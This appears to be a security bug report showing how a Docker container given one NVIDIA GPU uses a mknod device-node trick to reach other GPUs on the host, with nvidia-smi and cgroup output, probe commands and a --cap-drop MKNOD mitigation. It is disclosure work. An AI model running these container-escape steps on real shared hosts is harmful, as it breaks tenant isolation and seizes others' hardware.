A GPU container can gain access to other GPUs on the host

1. Issue description

A GPU container can break device isolation and gain access to other GPUs on the host.

2. Steps to reproduce the issue

Start a GPU container with only GPU 0 attached (/dev/nvidia0):

$ docker run -it -e NVIDIA_VISIBLE_DEVICES=0  nvidia/cuda:10.1-runtime-ubuntu16.04 bash

The container can access GPU 0 as expected:

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 07:50:56 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

The devices cgroup whitelist, with c 195:0 rw for GPU 0, is also as expected:

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

BUT: if I create another GPU device file using GPU 0's major/minor number, something unexpected happens.

root@5f0921a756de:/# mknod -m 666 /dev/nvidia1 c 195 0

The /dev/nvidia1 node is created successfully with nvidia0's device numbers (195, 0):

root@5f0921a756de:/# ll /dev/nvidia*
crw-rw-rw- 1 root root 236,   0 Oct  9 01:33 /dev/nvidia-uvm
crw-rw-rw- 1 root root 236,   1 Oct  9 01:33 /dev/nvidia-uvm-tools
crw-rw-rw- 1 root root 195,   0 Oct  9 01:32 /dev/nvidia0
crw-rw-rw- 1 root root 195,   0 Nov  4 08:15 /dev/nvidia1
crw-rw-rw- 1 root root 195, 255 Oct  9 01:32 /dev/nvidiactl

Unexpectedly, GPU 1 is now listed by nvidia-smi:

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 08:20:45 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

And the devices cgroup whitelist has not changed at all:

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

I also ran a TensorFlow demo in the container, and both GPUs could indeed be used.
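
For reference, a minimal check of what the framework sees (a sketch only, assuming Python 3 and TensorFlow 2.x have been installed in the container; the base CUDA runtime image does not ship them):

# list the GPUs visible to TensorFlow; after the mknod trick both GPUs are expected to appear
$ python3 -c "import tensorflow as tf; print(tf.config.list_physical_devices('GPU'))"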

This problem can be avoided by adding --cap-drop MKNOD to docker run, but Docker containers have the MKNOD capability by default.
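
For example, a sketch of the mitigation using the same image as above:

# drop CAP_MKNOD so device nodes cannot be created inside the container
$ docker run -it --cap-drop MKNOD -e NVIDIA_VISIBLE_DEVICES=0 nvidia/cuda:10.1-runtime-ubuntu16.04 bash

# inside the container, the mknod from above is now expected to fail with "Operation not permitted":
mknod -m 666 /dev/nvidia1 c 195 0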

It seems this operation can trick the devices cgroup into granting access to other GPUs on the host: the whitelist matches only on major/minor numbers, and the c *:* m entry allows mknod of arbitrary device nodes, so any node created with the whitelisted numbers 195:0 is permitted no matter what name it is given.
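
A rough probe of this from inside the container (a sketch only; the /tmp/probe-* names are arbitrary, it assumes GPU 1's real node on the host is 195:1, and it does not claim to be the full mechanism):

# "c *:* m" lets us mknod any char device, whatever its numbers
mknod -m 666 /tmp/probe-real c 195 1   # GPU 1's assumed real numbers
mknod -m 666 /tmp/probe-fake c 195 0   # GPU 0's numbers under an arbitrary name

# the whitelist is only consulted at open(), and only by major:minor
dd if=/tmp/probe-real of=/dev/null count=0   # expected to fail: 195:1 is not whitelisted
dd if=/tmp/probe-fake of=/dev/null count=0   # expected to succeed: 195:0 is whitelisted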

This is a serious security risk.